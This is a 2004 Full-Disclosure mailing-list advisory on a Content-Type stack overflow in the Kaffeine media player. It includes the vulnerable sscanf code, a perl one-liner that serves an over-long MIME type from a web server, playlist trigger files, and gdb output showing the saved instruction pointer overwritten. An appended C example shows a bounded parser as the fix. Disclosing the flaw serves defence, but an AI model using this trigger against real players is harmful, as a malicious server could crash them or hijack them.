[Full-Disclosure] Kaffeine Media Player Content Type overflow

From: KF (kfinisterre_at_secnetops.biz)
Date: 10/26/04

    To: fulldis list <full-disclosure@lists.netsys.com>
    Date: Mon, 25 Oct 2004 20:06:24 -0500
    
    
    

    Author did not respond and I could not exploit... enjoy.
    there will be a proper advisory when I am not being so lazy
    -KF

    
    

    Kaffeine >=0.4.2
    http://kaffeine.sourceforge.net/download.html

    Tested on SuSE Linux 9.1 on source compiled from kaffeine-0.4.3b.tar.bz2
    also Tested on various SuSE and Fedora RPMS

    On SuSE Linux 9.1 (i586) - Kernel 2.6.5-7.108-default
    http://www.suse.com/us/private/download/linuks/i386/update_for_9_1/extra.html
    1558f5f4178cc1acbac0a068fb0bf43c kaffeine.rpm

    ftp://packman.iu-bremen.de/testing/xine-cvs/kaffeine/
    kaffeine-0.5cvs-200409180035.i686.rpm

    ftp://packman.iu-bremen.de/suse/9.1/i686/
    kaffeine-0.4.3b-0.pm.0.i686.rpm

    http://rpm.pbone.net/index.php3/stat/17/dept/5/idg/Productivity_Multimedia_Video_Players
    kaffeine-0.4.2-6.i586.rpm

    Fedora Core release 2.90 (FC3 Test 1) Kernel 2.6.7-1.478custom on an i686
    http://rpmseek.com/rpm-pl/kaffeine.html?hl=com&cx=0::
    kaffeine-0.4.3-0.lvn.1.b.2.i386.rpm
    kaffeine-0.4.3-0.lvn.1.b.1.i386.rpm

    This can be triggered via any Real Audio Media - ram playlist file.

    kaffeine-0.4.3b/kaffeine/playlist.cpp:
    These are your file limitations.
    PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after)
    ..
        /* check for ram playlist */
         if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext == "lsc") || (ext == "pl") )
         {
    ...
      
    The overflow occurs here.
    kaffeine-0.4.3b/kaffeine/http.c:

    static http_t *http_open (const char *mrl) {

      http_t *this;
    ...
            if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {

    Sample exploitation.

    To cause the exploit, modify /etc/mime.types for the .ram extension: make it
    AAAAAAAAAAAAAAAAAAAAA.... instead of audio/x-pn-realaudio

    linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram > /etc/mime.types ; /etc/init.d/apache2 restart
    Syntax OK
    Shutting down httpd2 (waiting for all children to terminate) done
    Starting httpd2 (prefork)

    [root@threat root]# kaffeine http://192.168.1.207/test.pl
    http: content length = 30 bytes
    http: content type = 'text/plain;'
    http: content length = 0 bytes
    http: content type =
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'
    [root@threat root]# KCrash: Application 'kaffeine' crashing...

    create a file named exme.ram in your wwwroot
    and create a file named test.pl with the contents:
    http://host/exme.ram

    Upon reading the test.pl file, either via http or via double click, kaffeine
    will attempt to download the file exme.ram. It will check the mimetype
    that the server is offering and proceed to copy it into a small buffer.

    This can also be exploited by directly viewing the .ram file.

    The exact eip hit looks like this:
    (gdb) c
    Continuing.
    http: content length = 30 bytes
    http: content type = 'text/plain;'
    http: content length = 0 bytes
    http: content type =
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread -150400896 (LWP 2328)]
    0x080b869c in SubtitleChooser::staticMetaObject ()
    (gdb) bt
    #0 0x080b869c in SubtitleChooser::staticMetaObject ()
    #1 0x5a5a5a5a in ?? ()
    #2 0x44434241 in ?? ()
    #3 0x097a1200 in ?? ()
    #4 0x00000000 in ?? ()
    #5 0x00000000 in ?? ()
    #6 0x00000000 in ?? ()
    #7 0x00000000 in ?? ()
    #8 0xfef17b28 in ?? ()
    #9 0x09794b70 in ?? ()
    #10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #11 0x00000018 in ?? ()
    #12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #13 0x096c3770 in ?? ()
    #14 0x096c3760 in ?? ()
    #15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #16 0xfef17b48 in ?? ()
    #17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
    Previous frame inner to this frame (corrupt stack?)

    (gdb) i f
    Stack level 0, frame at 0xfef17ae0:
     eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
    0x5a5a5a5a
     called by frame at 0xfef17ae4
     Arglist at 0xfef17ad8, args:
     Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
     Saved registers:
      ebp at 0xfef17ad8, eip at 0xfef17adc

    0xfeea9b20: 'A' <repeats 200 times>...
    0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD"

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
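The bug the post points at is the unbounded sscanf("Content-Type: %s") copy in http_open(). Below is an added example written for this page, not Kaffeine's code, of the bounded parse that should replace it: MIME_MAX, parse_content_type, parsed_equals and check_overlong_header are constructed names, and the over-long header mirrors the post's 316 'A's followed by "ZZZZABCD".

```c
#include <stdio.h>
#include <string.h>

/* Size of the fixed buffer the MIME type is copied into (constructed for
 * this example; the post does not give Kaffeine's actual buffer size). */
#define MIME_MAX 64

/* Bounded replacement for sscanf(buf, "Content-Type: %s", mime_type).
 * Returns 1 if a value was copied, 0 if the line is not a Content-Type
 * header, -1 if the value would not fit in mime_len bytes (refused, not
 * truncated, so an over-long header is visible as an error). */
int parse_content_type(const char *line, char *mime_type, size_t mime_len) {
    static const char prefix[] = "Content-Type:";
    size_t plen = sizeof(prefix) - 1;
    if (mime_len == 0 || strncmp(line, prefix, plen) != 0)
        return 0;
    const char *p = line + plen;
    while (*p == ' ' || *p == '\t')
        p++;
    size_t n = strcspn(p, " \t\r\n");   /* token ends at whitespace or EOL */
    if (n == 0)
        return 0;
    if (n >= mime_len) {                 /* would overflow the buffer */
        mime_type[0] = '\0';
        return -1;
    }
    memcpy(mime_type, p, n);
    mime_type[n] = '\0';
    return 1;
}

/* 1 if the line parses and yields exactly `expected`, else 0. */
int parsed_equals(const char *line, const char *expected) {
    char mime_type[MIME_MAX];
    return parse_content_type(line, mime_type, sizeof mime_type) == 1 &&
           strcmp(mime_type, expected) == 0;
}

/* Builds the post's 316 x 'A' + "ZZZZABCD" value (constructed here) and
 * returns the parser's verdict: -1 means the oversize value was refused. */
int check_overlong_header(void) {
    char line[400];
    char mime_type[MIME_MAX];
    memset(line, 'A', sizeof line);
    memcpy(line, "Content-Type: ", 14);
    memcpy(line + 14 + 316, "ZZZZABCD\r\n", 11);   /* 11 includes the NUL */
    return parse_content_type(line, mime_type, sizeof mime_type);
}

int main(void) {
    printf("normal:   %d\n", parsed_equals("Content-Type: text/plain;\r\n", "text/plain;"));
    printf("overlong: %d\n", check_overlong_header());
    return 0;
}
```

A width-limited format such as "%63s" would also stop the overflow but silently truncates; the explicit length check above lets the caller log or reject a malformed header instead.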

